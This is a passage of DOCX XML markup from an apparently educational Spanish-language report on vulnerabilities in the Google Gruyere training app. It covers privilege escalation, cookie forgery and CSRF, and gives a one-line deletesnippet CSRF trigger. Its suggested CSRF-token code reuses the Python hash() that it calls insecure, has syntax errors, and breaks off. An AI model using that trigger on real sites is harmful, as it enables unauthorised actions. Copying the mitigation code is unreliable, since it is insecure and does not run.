        <w:r w:rsidRPr="0047476A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github-com.translate.goog/ui/django-html_sanitizer?_x_tr_sl=auto&amp;_x_tr_tl=es&amp;_x_tr_hl=es&amp;_x_tr_pto=wapp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03EA409F" w14:textId="4CBDC464" w:rsidR="000B7BE6" w:rsidRDefault="000B7BE6" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
        <w:rPr>
          <w:rStyle w:val="Hipervnculo"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272405C0" w14:textId="77777777" w:rsidR="000B7BE6" w:rsidRDefault="000B7BE6" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0064ECD5" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3116FCA1" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B363428" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751CBC54" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="645"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4F6F2A" w14:textId="1B04D7CB" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D74371" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6811F6B0" w14:textId="77777777" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAAA766" w14:textId="6FE4B624" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A"/>
    <w:p w14:paraId="342C64DC" w14:textId="26262769" w:rsidR="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A"/>
    <w:p w14:paraId="20C2B8AB" w14:textId="77777777" w:rsidR="0028424A" w:rsidRPr="0028424A" w:rsidRDefault="0028424A" w:rsidP="0028424A"/>
    <w:p w14:paraId="60E85E8D" w14:textId="4380308D" w:rsidR="00696C06" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812513" w:history="1">
        <w:bookmarkStart w:id="73" w:name="_Toc128034181"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Elevación de privilegios -&gt;</w:t>
        </w:r>
        <w:bookmarkEnd w:id="73"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="27D3721B" w14:textId="77777777" w:rsidR="0017241C" w:rsidRPr="0017241C" w:rsidRDefault="0017241C" w:rsidP="0017241C"/>
    <w:p w14:paraId="1A4E5030" w14:textId="77777777" w:rsidR="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>El problema es que no hay validaciones de la consulta anterior del usuario en el lado del servidor. Un ID de usuario sin derechos de administrador puede convertirse en administrador, lo que no debería ser posible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967083F" w14:textId="77777777" w:rsidR="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Tampoco se debería guardar esa información en la cookie, ya que puede ser modificable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148A0D1" w14:textId="10B42551" w:rsidR="00696C06" w:rsidRPr="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>Se debería denegar el acceso a los recursos, un usuario no puede poner en una    URL una cadena y cambiar su datos de sesión desde ahí</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DACBA" w14:textId="1B4823E1" w:rsidR="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06"/>
    <w:p w14:paraId="39952D14" w14:textId="2AEF36E7" w:rsidR="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06"/>
    <w:p w14:paraId="6F535B1A" w14:textId="77777777" w:rsidR="00696C06" w:rsidRPr="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06"/>
    <w:p w14:paraId="4F2DCED3" w14:textId="46A0E799" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812514" w:history="1">
        <w:bookmarkStart w:id="74" w:name="_Toc128034182"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Manipulación de cookies -&gt;</w:t>
        </w:r>
        <w:bookmarkEnd w:id="74"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="25E1BCD7" w14:textId="601638EE" w:rsidR="0017241C" w:rsidRDefault="0017241C" w:rsidP="0017241C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506DA3E5" w14:textId="77777777" w:rsidR="0017241C" w:rsidRDefault="0017241C" w:rsidP="0017241C">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>-El servidor debe escapar del nombre del usuario cuando se construye la cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19355D2A" w14:textId="77777777" w:rsidR="0017241C" w:rsidRDefault="0017241C" w:rsidP="00B61E58">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>-El servidor debe rechazar una cookie si no coincide con el patrón que se espera.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43C6FC" w14:textId="56897AF6" w:rsidR="0017241C" w:rsidRDefault="0017241C" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8504"/>
        </w:tabs>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Que en la cookie no se guarde un estado, es decir ser administrador, usuario…</w:t>
      </w:r>
      <w:r w:rsidR="00DB1A2F">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="537971A0" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Podremos ver en esta aplicación la gestión de las cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7508E2C2" w14:textId="62898C46" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>gruyere.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D7391D" w14:textId="3FD860A4" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B950286" wp14:editId="4E862AC1">
            <wp:extent cx="5400040" cy="454152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00040" cy="4541520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B00446C" w14:textId="618D507A" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0CB228" wp14:editId="3C8A5A7D">
            <wp:extent cx="5400040" cy="4541520"/>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00040" cy="4541520"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05553D7A" w14:textId="32242D0A" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D58D05" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora veremos la función hash de las cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FC9E3" w14:textId="508F08A8" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D17A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>h_data =str(hash(cookie_secret+c_data) &amp; 0x7FFFFFF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BF205" w14:textId="6E906D40" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C99468D" w14:textId="02966C87" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D17A1">
        <w:t>Cookie_secret: es una c</w:t>
      </w:r>
      <w:r>
        <w:t>adena estática (que es solo “ por defecto, lo que significa que una cadena vacía es el secreto de la cookie),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F34411F" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>c_data: el nombre del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3416A" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="003A411B" w:rsidRDefault="00DB1A2F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003A411B">
        <w:t>&amp; 0x7FFFFFF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Y operador con Hex: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A411B">
        <w:t>0x7FFFFFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E162C9" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>str(hash()): función hash de la cadena.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E97ACB5" w14:textId="37DB9523" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">h_data: nombre del </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB">
        <w:t>usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC1C5F" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="001D17A1" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FCED46" w14:textId="1F195A42" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Python hash() no es adecuado para el propósito, o digamos inseguro en este contexto, porque es posible encontrar colisiones criptográficas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39274E8D" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Este hash() se usa en las tablas hash de los diccionarios de Python, donde no pueden permitirse una función hash totalmente segura, porque ralentizaría mucho los cálculos y bel uso de esos diccionarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD52F0" w14:textId="46DD67C2" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python proporciona funciones hash seguras en el módulo hashlib: </w:t>
      </w:r>
      <w:hyperlink r:id="rId320" w:history="1">
        <w:r w:rsidRPr="009C39EC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://docs.python.org/3/library/hashlib.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="13104A26" w14:textId="77777777" w:rsidR="00696C06" w:rsidRPr="00696C06" w:rsidRDefault="00696C06" w:rsidP="00696C06"/>
    <w:p w14:paraId="2B646040" w14:textId="0FBF0304" w:rsidR="00D33545" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc127812515" w:history="1">
        <w:bookmarkStart w:id="75" w:name="_Toc128034183"/>
        <w:r w:rsidR="00D33545" w:rsidRPr="00610E00">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Falsificación de solicitudes entre sitios (XSRF/CSFR)</w:t>
        </w:r>
        <w:bookmarkEnd w:id="75"/>
      </w:hyperlink>
      <w:r w:rsidR="00DB1A2F">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3619C" w14:textId="07245725" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5104BBE9" w14:textId="3B0ED345" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C3124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B739191" wp14:editId="72C60F40">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBE312" w14:textId="22D2FDB0" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24786158" w14:textId="4F6E22F8" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Cuando incluimos la función deletesnippet?index=?0 en el formulario de icono, y después de actualizar, esto activa una acción en el servidor con la función def_DoDeletesnippet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F405F6E" w14:textId="7399E8E8" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72890656" w14:textId="0EDDDF11" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="000C3124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B9FDB25" wp14:editId="05D43DAF">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C35455" w14:textId="108733D2" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6414B074" w14:textId="7DF534C1" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Encontramos que Google Gruyere tiene una falla sistemática, por el uso de la solicitud GET en lugar de la solicitud POST, para enviar y actualizar datos confidenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C248E8" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>GET se usa para ver algo, sin cambiarlo, mientras que POST se usa para cambiar algo. Por ejemplo, una página de búsqueda debe usar GET para obtener datos, mientras que un formulario que cambia su contraseña debe usar POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20739BF0" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Esencialmente GET se usa para recuperar datos y POST para insertar/actualizar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E320DBF" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Una primera acción sería cambiar la solicitud GET a POST, ya que el método GET no es apropiado para este contexto, pero esto no será suficiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31461DC6" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Enumerar los valores del formulario, evaluar que no aparezcan campos extraños y filtrar y limpiar los valores esperados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0F00C" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>-Los tokens CSRF ayudan contra los bots de envío de formularios arbitrarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F17645E" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ya vimos antes como limpiar, ahora veremos sobre los tokens CSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F727225" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Para evitar un ataque CSRF, una posible solución es incorporar datos de autentificación adicionales en la solicitud HTTP, de modo que la aplicación web pueda detectar cualquier solicitud no autorizada creada por un atacante y colocada en un formulario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2491C2FF" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Los token CSRF suelen ser números aleatorios que se almacenan en una cookie en el servidor. Lo que sucederá es que el servidor comparara el token adjunto a las cookies con el del servidor. Si los valores son iguales se aprobará la solicitud, si no se denegará.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2640B" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Google propone pasar un action_token en todas las solicitudes HTML y usar un hash del valor de la cookie del usuario adjunto a una marca de tiempo actual (la marca del tiempo garantizará que los tokens antiguos caduquen). La solicitud POST mitigara el riesgo de pasar action_token como parámetro de la URL, este sería el código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF49E57" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00290DA9" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def _GenerateXsrfToken(self,cookie):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B26C1" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00290DA9" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  timestamp = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA87F7" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00290DA9">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  return timestamp +”|”+ (str(hash(cookie_secret + cookie +timestamp)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FEDE02" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>def _VerifyXsfrToken(self,cookie,action_token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D97ACF2" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  (action_time,action_hash) = action_token.split(“|”,1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED29EEC" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  now = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127A9DD" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">  if now – 86400 &gt; float (action_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC4CF1" w14:textId="77777777" w:rsidR="00DB1A2F" w:rsidRPr="00810052" w:rsidRDefault="00DB1A2F" w:rsidP="00DB1A2F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00810052">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    return false</w:t>
